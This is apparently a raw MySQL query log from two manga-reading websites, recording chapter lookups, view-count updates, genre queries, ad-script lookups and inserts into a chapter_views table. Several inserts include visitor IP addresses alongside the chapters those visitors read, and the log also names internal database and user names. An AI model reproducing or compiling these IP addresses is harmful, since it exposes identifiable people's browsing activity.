VALUES ('346', '17682', '2405:9800:b671:4456:d015:90c0:e0a1:cb9c', 'mangacherri.com', '2026-02-26 03:29:52', '2026-02-26 03:29:52') 330657948 Quit 330657949 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657949 Query select * FROM chapter_images where chapter_id = '17682' 330657949 Quit 330657950 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657950 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '346' and m.active = 1 330657950 Quit 330657951 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657951 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='346' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Slice of Life%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 260225 19:29:53 330657940 Quit 330657952 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657953 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657952 Quit 330657953 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330657953 Quit 330657954 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657955 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657954 Quit 330657955 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330657955 Quit 330657956 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657957 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657957 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330657957 Quit 330657958 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657956 Quit 330657959 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657958 Quit 330657959 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330657959 Quit 330657951 Quit 330657960 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657961 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657960 Quit 330657961 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330657961 Quit 330657962 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657963 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657962 Quit 330657963 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330657963 Quit 330657964 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657965 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657965 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330657964 Quit 330657965 Quit 330657966 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657967 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657967 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330657966 Quit 330657967 Quit 330657968 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657969 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657968 Quit 330657969 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '17621' 330657969 Quit 330657970 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657970 Query select * FROM chapters where id = '17621' 330657970 Quit 330657971 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657971 Query select * FROM chapters where manga_id = '346' order by id desc 330657971 Quit 330657972 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657972 Query Update chapters set view=view+1 where id = '17621' 330657972 Quit 330657973 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657973 Query select * FROM chapters where id = '17621' 330657973 Quit 330657974 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657974 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '17621' 330657974 Quit 330657975 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657975 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('346', '17621', '2405:9800:b671:4456:d015:90c0:e0a1:cb9c', 'mangacherri.com', '2026-02-26 03:29:53', '2026-02-26 03:29:53') 330657975 Quit 330657976 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657976 Query select * FROM chapter_images where chapter_id = '17621' 330657976 Quit 330657977 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657977 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '346' and m.active = 1 330657977 Quit 330657978 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657978 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='346' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Slice of Life%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 330657979 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657980 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657979 Quit 330657980 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '16928' 330657980 Quit 330657981 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657981 Query select * FROM chapters where id = '16928' 330657981 Quit 330657982 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657982 Query select * FROM chapters where manga_id = '33' order by id desc 330657983 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657983 Quit 330657982 Quit 330657984 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657984 Query Update chapters set view=view+1 where id = '16928' 330657984 Quit 330657985 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657985 Query select * FROM chapters where id = '16928' 330657985 Quit 330657986 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657986 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '16928' 330657986 Quit 330657987 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657987 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('33', '16928', '2a02:3102:830c:780:e1d4:18e4:7b2f:6354', 'mangacherri.com', '2026-02-26 03:29:53', '2026-02-26 03:29:53') 330657987 Quit 330657988 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657988 Query select * FROM chapter_images where chapter_id = '16928' 330657988 Quit 330657989 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657989 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '33' and m.active = 1 330657989 Quit 330657990 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657990 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='33' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shounen%') ORDER BY RAND() limit 10 330657991 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657992 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657991 Quit 330657992 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '18390' 330657992 Quit 330657993 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657993 Query select * FROM chapters where id = '18390' 330657993 Quit 330657994 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657994 Query select * FROM chapters where manga_id = '35' order by id desc 330657994 Quit 330657995 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657995 Query Update chapters set view=view+1 where id = '18390' 330657995 Quit 330657996 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657996 Query select * FROM chapters where id = '18390' 330657997 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657996 Quit 330657997 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '18390' 330657997 Quit 330657998 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657998 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('35', '18390', '2401:4900:88f5:ef2f:8960:d4bc:ce6:bad7', 'mangacherri.com', '2026-02-26 03:29:53', '2026-02-26 03:29:53') 330657998 Quit 330657999 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657999 Query select * FROM chapter_images where chapter_id = '18390' 330657999 Quit 330658000 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658000 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '35' and m.active = 1 330658000 Quit 330658001 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658001 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='35' and m.active = 1 AND (genres like '%Drama%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shoujo%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 330657978 Quit 330658002 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658003 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658002 Quit 330658003 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330658003 Quit 330658004 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658005 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658004 Quit 330658005 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658005 Quit 330658006 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658007 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658006 Quit 330658007 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658007 Quit 330658008 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658009 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658009 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658008 Quit 330658009 Quit 260225 19:29:54 330658010 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658011 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658010 Quit 330658011 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '3299' 330658011 Quit 330658012 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658012 Query select * FROM chapters where id = '3299' 330658012 Quit 330658013 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658013 Query select * FROM chapters where manga_id = '78' order by id desc 330658013 Quit 330658014 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658014 Query Update chapters set view=view+1 where id = '3299' 330658014 Quit 330658015 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658015 Query select * FROM chapters where id = '3299' 330658016 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658016 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '3299' 330658015 Quit 330658016 Quit 330658017 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658017 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('78', '3299', '2003:d5:df46:6b00:ef85:55d0:af81:8060', 'mangacherri.com', '2026-02-26 03:29:54', '2026-02-26 03:29:54') 330658017 Quit 330658018 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658018 Query select * FROM chapter_images where chapter_id = '3299' 330657990 Quit 330658019 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658020 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658019 Quit 330658020 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330658020 Quit 330658021 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658022 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658022 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658021 Quit 330658022 Quit 330658023 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658024 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658023 Quit 330658024 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658024 Quit 330658025 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658026 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658025 Quit 330658026 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658026 Quit 330658001 Quit 330658027 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658028 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658028 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330658027 Quit 330658028 Quit 330658029 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658030 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658029 Quit 330658030 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658030 Quit 330658031 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658032 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658031 Quit 330658032 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658032 Quit 330658033 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658034 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658033 Quit 330658034 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658034 Quit 330658035 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658036 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658035 Quit 330658036 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12929' 330658036 Quit 330658037 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658037 Query select * FROM chapters where id = '12929' 330658038 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658037 Quit 330658038 Query select * FROM chapters where manga_id = '193' order by id desc 330658038 Quit 330658039 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658039 Query Update chapters set view=view+1 where id = '12929' 330658039 Quit 330658040 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658041 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658041 Query select * FROM chapters where id = '12929' 330658042 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658040 Quit 330658042 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '1768' and m.active = 1 330658043 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658041 Quit 330658043 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12929' 330658042 Quit 330658043 Quit 330658044 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658044 Query select * FROM chapters where id = '1768' 330658045 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658045 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, created, modified) VALUES ('193', '12929', '89.221.127.180', '2026-02-26 03:29:54', '2026-02-26 03:29:54') 330658044 Quit 330658046 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658046 Query select * FROM chapters where manga_id = '99' order by display_priority ASC, id desc 330658045 Quit 330658047 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658047 Query select * FROM chapter_images where chapter_id = '12929' 330658047 Quit 330658048 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658046 Quit 330658049 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658048 Quit 330658049 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '193' 330658050 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658050 Query Update chapters set view=view+1 where id = '1768' 330658049 Quit 330658051 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658051 Query select * FROM chapters where manga_id = '193' order by id desc 330658050 Quit 330658051 Quit 330658053 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658052 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658052 Query select * FROM chapters where id = '1768' 330658054 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658053 Quit 330658052 Quit 330658054 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658054 Quit 330658055 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658055 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '1768' and m.active = 1 330658055 Quit 330658056 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658056 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('99', '1768', '54.39.136.153', 'mangaberri.com', '2026-02-26 03:29:54', '2026-02-26 03:29:54') 330658018 Quit 330658056 Quit 330658057 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658057 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '78' and m.active = 1 330658058 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658058 Query select * FROM chapter_images where chapter_id = '1768' 330658058 Quit 330658059 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658059 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '99' and m.active = 1 330658059 Quit 330658060 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658060 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='99' and m.active = 1 AND (genres like '%Action%' OR genres like '%Martial Arts%' OR genres like '%Sci-Fi%' OR genres like '%Shounen%' OR genres like '%Super Power%') ORDER BY RAND() limit 10 330658057 Quit 330658061 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658061 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='78' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shoujo%') ORDER BY RAND() limit 10 330658060 Quit 330658062 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658063 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658062 Quit 330658063 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330658063 Quit 330658064 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658065 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658064 Quit 330658065 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658065 Quit 330658066 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658067 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658066 Quit 330658067 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658067 Quit 330658068 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658069 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658069 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658068 Quit 330658069 Quit 330658070 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658071 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658070 Quit 330658071 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '17682' 330658071 Quit 330658072 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658072 Query select * FROM chapters where id = '17682' 330658072 Quit 330658073 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658073 Query select * FROM chapters where manga_id = '346' order by id desc 330658073 Quit 330658074 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658074 Query Update chapters set view=view+1 where id = '17682' 330658074 Quit 330658075 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658075 Query select * FROM chapters where id = '17682' 330658075 Quit 330658076 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658076 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '17682' 330658076 Quit 330658077 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658077 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('346', '17682', '2405:9800:b671:4456:d015:90c0:e0a1:cb9c', 'mangacherri.com', '2026-02-26 03:29:54', '2026-02-26 03:29:54') 330658077 Quit 330658078 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658078 Query select * FROM chapter_images where chapter_id = '17682' 330658078 Quit 330658079 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658079 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '346' and m.active = 1 330658080 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658080 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='346' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Slice of Life%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 330658079 Quit 330658061 Quit 330658081 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658082 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658082 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330658081 Quit 330658082 Quit 330658083 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658084 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658083 Quit 330658084 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658084 Quit 330658085 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658086 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658086 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658085 Quit 330658086 Quit 330658087 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658088 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658087 Quit 330658088 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658088 Quit 330658080 Quit 330658089 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658090 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658089 Quit 330658090 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330658090 Quit 330658091 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658092 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658091 Quit 330658092 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658092 Quit 330658093 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658094 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658093 Quit 330658094 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658094 Quit 330658095 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658096 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658095 Quit 330658096 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658096 Quit 330658097 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658098 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658097 Quit 330658098 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '4826' and m.active = 1 330658098 Quit 330658099 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658099 Query select * FROM chapters where id = '4826' 330658099 Quit 330658100 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658100 Query select * FROM chapters where manga_id = '141' order by display_priority ASC, id desc 330658100 Quit 330658101 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658101 Query Update chapters set view=view+1 where id = '4826' 330658101 Quit 330658102 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658102 Query select * FROM chapters where id = '4826' 330658102 Quit 330658103 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658103 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '4826' and m.active = 1 330658103 Quit 330658104 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658104 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('141', '4826', '172.245.195.18', 'mangaberri.com', '2026-02-26 03:29:54', '2026-02-26 03:29:54') 330658104 Quit 330658105 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658105 Query select * FROM chapter_images where chapter_id = '4826' 330658105 Quit 330658106 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658106 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '141' and m.active = 1 330658106 Quit 330658107 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658107 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='141' and m.active = 1 AND (genres like '%Action%' OR genres like '%Adventure%' OR genres like 